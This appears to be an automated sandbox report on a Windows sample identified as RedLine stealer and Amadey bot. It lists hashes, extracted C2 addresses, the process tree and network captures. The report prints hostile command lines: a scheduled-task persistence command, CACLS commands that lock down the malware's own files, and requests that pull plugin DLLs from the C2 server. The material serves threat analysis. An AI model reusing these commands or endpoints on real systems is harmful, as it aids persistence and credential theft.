Overview

overview

10

Static

static

1

f5ad1e15e1...6a.exe

windows7-x64

10

f5ad1e15e1...6a.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/02/2023, 09:42 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f5ad1e15e1211b60c066c1d924ff9c6a.exe

  • Size

    715KB

  • MD5

    f5ad1e15e1211b60c066c1d924ff9c6a

  • SHA1

    bd0abd13667843f4551c9b2940ec7b46ec811d02

  • SHA256

    ec7c4f05150f213e7be63cec7528aa7660acb543d4986c4e0aad7c90a2131889

  • SHA512

    d94662eaa93088ae89dd270b61f824bb5e3765c2402f30cd0d1f17401b431cc5df3eea112fddecb3329012d47365ce207b387acc2cad411d89158171830ee013

  • SSDEEP

    12288:4Mr7y90GH9osJXyscMZOqq2b+/1L0WSfAvD8aJPgHfLD1vr1bzgAnNMUkNj1m:TyHHNy7ca/14WAAvD8OOly4Mb4

Score
10/10
amadeyredlinefukiadiscoveryinfostealerpersistencespywarestealertrojan

Malware Config

Extracted

Family

redline

Botnet

fukia

C2

193.233.20.13:4136

Attributes
  • auth_value

    e5783636fbd9e4f0cf9a017bce02e67e

Extracted

Family

amadey

Version

3.66

C2

62.204.41.5/Bu58Ngs/index.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 8 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 6 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f5ad1e15e1211b60c066c1d924ff9c6a.exe
    "C:\Users\Admin\AppData\Local\Temp\f5ad1e15e1211b60c066c1d924ff9c6a.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:4916
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\spH05zC.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\spH05zC.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:4876
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sMS71xF.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sMS71xF.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:4480
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kHp83aI.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kHp83aI.exe
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1684
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mTJ79.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mTJ79.exe
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2132
          • C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe
            "C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2752
            • C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe" /F
              6⤵
              • Creates scheduled task(s)
              PID:4072
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "Admin:N"&&CACLS "mnolyk.exe" /P "Admin:R" /E&&echo Y|CACLS "..\5eb6b96734" /P "Admin:N"&&CACLS "..\5eb6b96734" /P "Admin:R" /E&&Exit
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1924
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                7⤵
                  PID:5048
                • C:\Windows\SysWOW64\cacls.exe
                  CACLS "mnolyk.exe" /P "Admin:N"
                  7⤵
                    PID:3048
                  • C:\Windows\SysWOW64\cacls.exe
                    CACLS "mnolyk.exe" /P "Admin:R" /E
                    7⤵
                      PID:2136
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      7⤵
                        PID:1756
                      • C:\Windows\SysWOW64\cacls.exe
                        CACLS "..\5eb6b96734" /P "Admin:N"
                        7⤵
                          PID:4216
                        • C:\Windows\SysWOW64\cacls.exe
                          CACLS "..\5eb6b96734" /P "Admin:R" /E
                          7⤵
                            PID:4060
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                          6⤵
                          • Loads dropped DLL
                          PID:2944
                  • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nmb57Na.exe
                    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nmb57Na.exe
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:368
              • C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe
                C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe
                1⤵
                • Executes dropped EXE
                PID:2364
              • C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe
                C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe
                1⤵
                • Executes dropped EXE
                PID:648

              Network

              • flag-ru
                POST
                http://62.204.41.5/Bu58Ngs/index.php
                mnolyk.exe
                Remote address:
                62.204.41.5:80
                Request
                POST /Bu58Ngs/index.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: 62.204.41.5
                Content-Length: 89
                Cache-Control: no-cache
                Response
                HTTP/1.1 200 OK
                Server: nginx/1.18.0 (Ubuntu)
                Date: Tue, 14 Feb 2023 09:42:28 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: keep-alive
              • flag-ru
                GET
                http://62.204.41.5/Bu58Ngs/Plugins/cred64.dll
                mnolyk.exe
                Remote address:
                62.204.41.5:80
                Request
                GET /Bu58Ngs/Plugins/cred64.dll HTTP/1.1
                Host: 62.204.41.5
                Response
                HTTP/1.1 404 Not Found
                Server: nginx/1.18.0 (Ubuntu)
                Date: Tue, 14 Feb 2023 09:43:17 GMT
                Content-Type: text/html
                Content-Length: 162
                Connection: keep-alive
              • flag-ru
                GET
                http://62.204.41.5/Bu58Ngs/Plugins/clip64.dll
                mnolyk.exe
                Remote address:
                62.204.41.5:80
                Request
                GET /Bu58Ngs/Plugins/clip64.dll HTTP/1.1
                Host: 62.204.41.5
                Response
                HTTP/1.1 200 OK
                Server: nginx/1.18.0 (Ubuntu)
                Date: Tue, 14 Feb 2023 09:43:17 GMT
                Content-Type: application/octet-stream
                Content-Length: 91136
                Last-Modified: Fri, 03 Feb 2023 16:52:27 GMT
                Connection: keep-alive
                ETag: "63dd3bcb-16400"
                Accept-Ranges: bytes
              • 193.233.20.13:4136
                kHp83aI.exe
                3.9MB
                 53.2kB
                 2878
                1175
              • 193.233.20.12:4132
                nmb57Na.exe
                260 B
                 5
              • 62.204.41.5:80
                http://62.204.41.5/Bu58Ngs/Plugins/clip64.dll
                http
                mnolyk.exe
                3.8kB
                 94.9kB
                 76
                75

                HTTP Request

                POST http://62.204.41.5/Bu58Ngs/index.php

                HTTP Response

                200

                HTTP Request

                GET http://62.204.41.5/Bu58Ngs/Plugins/cred64.dll

                HTTP Response

                404

                HTTP Request

                GET http://62.204.41.5/Bu58Ngs/Plugins/clip64.dll

                HTTP Response

                200
              • 72.21.81.240:80
                322 B
                 7
              • 193.233.20.12:4132
                nmb57Na.exe
                260 B
                 5
              • 104.80.225.205:443
                322 B
                 7
              • 72.21.81.240:80
                322 B
                 7
              • 72.21.81.240:80
                322 B
                 7
              • 193.233.20.12:4132
                nmb57Na.exe
                260 B
                 5
              • 193.233.20.12:4132
                nmb57Na.exe
                260 B
                 5
              • 193.233.20.12:4132
                nmb57Na.exe
                260 B
                 5
              • 193.233.20.12:4132
                nmb57Na.exe
                52 B
                 1
              No results found

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe
                Filesize

                236KB

                MD5

                fde8915d251fada3a37530421eb29dcf

                SHA1

                44386a8947ddfab993409945dae05a772a13e047

                SHA256

                6cbcf0bb90ae767a8c554cdfa90723e6b1127e98cfa19a2259dd57813d27e116

                SHA512

                ffc253ad4308c7a34ec5ced45cc5eda21a43a9fa59927a323829e2e87a0060c93a051c726f2f6f65ffdb8ac9666f88bf2622c975a24a6718c99ac9a44c6fd7fd

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe
                Filesize

                236KB

                MD5

                fde8915d251fada3a37530421eb29dcf

                SHA1

                44386a8947ddfab993409945dae05a772a13e047

                SHA256

                6cbcf0bb90ae767a8c554cdfa90723e6b1127e98cfa19a2259dd57813d27e116

                SHA512

                ffc253ad4308c7a34ec5ced45cc5eda21a43a9fa59927a323829e2e87a0060c93a051c726f2f6f65ffdb8ac9666f88bf2622c975a24a6718c99ac9a44c6fd7fd

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe
                Filesize

                236KB

                MD5

                fde8915d251fada3a37530421eb29dcf

                SHA1

                44386a8947ddfab993409945dae05a772a13e047

                SHA256

                6cbcf0bb90ae767a8c554cdfa90723e6b1127e98cfa19a2259dd57813d27e116

                SHA512

                ffc253ad4308c7a34ec5ced45cc5eda21a43a9fa59927a323829e2e87a0060c93a051c726f2f6f65ffdb8ac9666f88bf2622c975a24a6718c99ac9a44c6fd7fd

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe
                Filesize

                236KB

                MD5

                fde8915d251fada3a37530421eb29dcf

                SHA1

                44386a8947ddfab993409945dae05a772a13e047

                SHA256

                6cbcf0bb90ae767a8c554cdfa90723e6b1127e98cfa19a2259dd57813d27e116

                SHA512

                ffc253ad4308c7a34ec5ced45cc5eda21a43a9fa59927a323829e2e87a0060c93a051c726f2f6f65ffdb8ac9666f88bf2622c975a24a6718c99ac9a44c6fd7fd

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\spH05zC.exe
                Filesize

                612KB

                MD5

                7094ab66eeb5c57922739891f528af69

                SHA1

                4f0c74da394ab5d4098e797b429b29289a240b66

                SHA256

                69735b510790de25e419be9affb0d42fd4305d43dbd97f02433f6ae218387150

                SHA512

                e6bc6b0711e98a0dd27ce261eb981982484b37447deca9ccec9727f90f1b95a8b9c0b6f7ead88ecdce459441e0a7c13e39bbbb57dc83f349f7439dc329ae58fb

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\spH05zC.exe
                Filesize

                612KB

                MD5

                7094ab66eeb5c57922739891f528af69

                SHA1

                4f0c74da394ab5d4098e797b429b29289a240b66

                SHA256

                69735b510790de25e419be9affb0d42fd4305d43dbd97f02433f6ae218387150

                SHA512

                e6bc6b0711e98a0dd27ce261eb981982484b37447deca9ccec9727f90f1b95a8b9c0b6f7ead88ecdce459441e0a7c13e39bbbb57dc83f349f7439dc329ae58fb

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nmb57Na.exe
                Filesize

                279KB

                MD5

                b7bb700e5a7a0c61fb93590366fe6ab9

                SHA1

                39a45f5aefb163427aa29ffcbdf130017cd52e62

                SHA256

                1516fc2758b409c7d53002665c888d62ac481d89679f4738c7d05cc672de319e

                SHA512

                605e922a2acb2008468dbe20f678b73af11a689d4081827f1ede264b4b9921b2579df2c56f70e196b793a5089805936a40aa1f886122ace11d05fb6259463319

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nmb57Na.exe
                Filesize

                279KB

                MD5

                b7bb700e5a7a0c61fb93590366fe6ab9

                SHA1

                39a45f5aefb163427aa29ffcbdf130017cd52e62

                SHA256

                1516fc2758b409c7d53002665c888d62ac481d89679f4738c7d05cc672de319e

                SHA512

                605e922a2acb2008468dbe20f678b73af11a689d4081827f1ede264b4b9921b2579df2c56f70e196b793a5089805936a40aa1f886122ace11d05fb6259463319

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sMS71xF.exe
                Filesize

                286KB

                MD5

                43d2f820b61628a4b22d28b66f047c09

                SHA1

                5b3becd2e875d39476fe74c224f00b646a89bfb8

                SHA256

                96f3eed77fb20dccbb3b3c6878f3bd2d5910cd90ed95452a7e539b29896cb085

                SHA512

                d432aaaef84846b4cc206e10364d4fc435261890095654964b863788354d86768a2941b0174dbd6820c4c1d26ac92a5dd3535b370e108b86293c473c25655c63

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sMS71xF.exe
                Filesize

                286KB

                MD5

                43d2f820b61628a4b22d28b66f047c09

                SHA1

                5b3becd2e875d39476fe74c224f00b646a89bfb8

                SHA256

                96f3eed77fb20dccbb3b3c6878f3bd2d5910cd90ed95452a7e539b29896cb085

                SHA512

                d432aaaef84846b4cc206e10364d4fc435261890095654964b863788354d86768a2941b0174dbd6820c4c1d26ac92a5dd3535b370e108b86293c473c25655c63

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kHp83aI.exe
                Filesize

                175KB

                MD5

                a5f5c5d6291c7ae9e1d1b7ed1e551490

                SHA1

                3d06413341893b838549939e15f8f1eec423d71a

                SHA256

                1a09ce1cb64219a5d88e57845dc9ba6631efa06fccc8867ccf94eb132947563e

                SHA512

                d9b3ba67bdd615ee2ce91a29cd9cf6723464be27bf45186fd0e9559ff2b0e7c51b423cfc3e32b5e90955046fb75a34c4a8528df7294b6c831ca254a65d2b8ba2

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kHp83aI.exe
                Filesize

                175KB

                MD5

                a5f5c5d6291c7ae9e1d1b7ed1e551490

                SHA1

                3d06413341893b838549939e15f8f1eec423d71a

                SHA256

                1a09ce1cb64219a5d88e57845dc9ba6631efa06fccc8867ccf94eb132947563e

                SHA512

                d9b3ba67bdd615ee2ce91a29cd9cf6723464be27bf45186fd0e9559ff2b0e7c51b423cfc3e32b5e90955046fb75a34c4a8528df7294b6c831ca254a65d2b8ba2

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mTJ79.exe
                Filesize

                236KB

                MD5

                fde8915d251fada3a37530421eb29dcf

                SHA1

                44386a8947ddfab993409945dae05a772a13e047

                SHA256

                6cbcf0bb90ae767a8c554cdfa90723e6b1127e98cfa19a2259dd57813d27e116

                SHA512

                ffc253ad4308c7a34ec5ced45cc5eda21a43a9fa59927a323829e2e87a0060c93a051c726f2f6f65ffdb8ac9666f88bf2622c975a24a6718c99ac9a44c6fd7fd

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mTJ79.exe
                Filesize

                236KB

                MD5

                fde8915d251fada3a37530421eb29dcf

                SHA1

                44386a8947ddfab993409945dae05a772a13e047

                SHA256

                6cbcf0bb90ae767a8c554cdfa90723e6b1127e98cfa19a2259dd57813d27e116

                SHA512

                ffc253ad4308c7a34ec5ced45cc5eda21a43a9fa59927a323829e2e87a0060c93a051c726f2f6f65ffdb8ac9666f88bf2622c975a24a6718c99ac9a44c6fd7fd

                Download Submit

              • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll
                Filesize

                89KB

                MD5

                9221a421a3e777eb7d4ce55e474bcc4a

                SHA1

                c96d7bd7ccbf9352d50527bff472595b3dc5298e

                SHA256

                10ee53988bcfbb4bb9c8928ea96c4268bd64b9dfd1f28c6233185e695434d2f8

                SHA512

                63ac172cb19c7c020676937cb35e853710d08e99e06e8cdcb410c37e0c9056af409a50fdec0c90a3c532edcf5e0f128fa1e2181063e1208d4fc4643b1b5736f3

                Download Submit

              • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll
                Filesize

                89KB

                MD5

                9221a421a3e777eb7d4ce55e474bcc4a

                SHA1

                c96d7bd7ccbf9352d50527bff472595b3dc5298e

                SHA256

                10ee53988bcfbb4bb9c8928ea96c4268bd64b9dfd1f28c6233185e695434d2f8

                SHA512

                63ac172cb19c7c020676937cb35e853710d08e99e06e8cdcb410c37e0c9056af409a50fdec0c90a3c532edcf5e0f128fa1e2181063e1208d4fc4643b1b5736f3

                Download Submit

              • memory/368-171-0x0000000000850000-0x000000000089B000-memory.dmp

                Filesize

                300KB

                Download

              • memory/368-170-0x0000000000933000-0x0000000000962000-memory.dmp

                Filesize

                188KB

                Download

              • memory/368-172-0x0000000000400000-0x00000000007A1000-memory.dmp

                Filesize

                3.6MB

                Download

              • memory/368-173-0x0000000000933000-0x0000000000962000-memory.dmp

                Filesize

                188KB

                Download

              • memory/1684-143-0x0000000004BD0000-0x0000000004CDA000-memory.dmp

                Filesize

                1.0MB

                Download

              • memory/1684-144-0x0000000004B00000-0x0000000004B12000-memory.dmp

                Filesize

                72KB

                Download

              • memory/1684-152-0x00000000068A0000-0x00000000068F0000-memory.dmp

                Filesize

                320KB

                Download

              • memory/1684-151-0x0000000006820000-0x0000000006896000-memory.dmp

                Filesize

                472KB

                Download

              • memory/1684-150-0x0000000006AB0000-0x0000000006FDC000-memory.dmp

                Filesize

                5.2MB

                Download

              • memory/1684-149-0x00000000063B0000-0x0000000006572000-memory.dmp

                Filesize

                1.8MB

                Download

              • memory/1684-148-0x0000000004FB0000-0x0000000005016000-memory.dmp

                Filesize

                408KB

                Download

              • memory/1684-147-0x0000000005670000-0x0000000005702000-memory.dmp

                Filesize

                584KB

                Download

              • memory/1684-141-0x0000000000130000-0x0000000000162000-memory.dmp

                Filesize

                200KB

                Download

              • memory/1684-142-0x0000000005050000-0x0000000005668000-memory.dmp

                Filesize

                6.1MB

                Download

              • memory/1684-145-0x0000000004B80000-0x0000000004BBC000-memory.dmp

                Filesize

                240KB

                Download

              • memory/1684-146-0x0000000005C20000-0x00000000061C4000-memory.dmp

                Filesize

                5.6MB

                Download

              We care about your privacy.

              This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.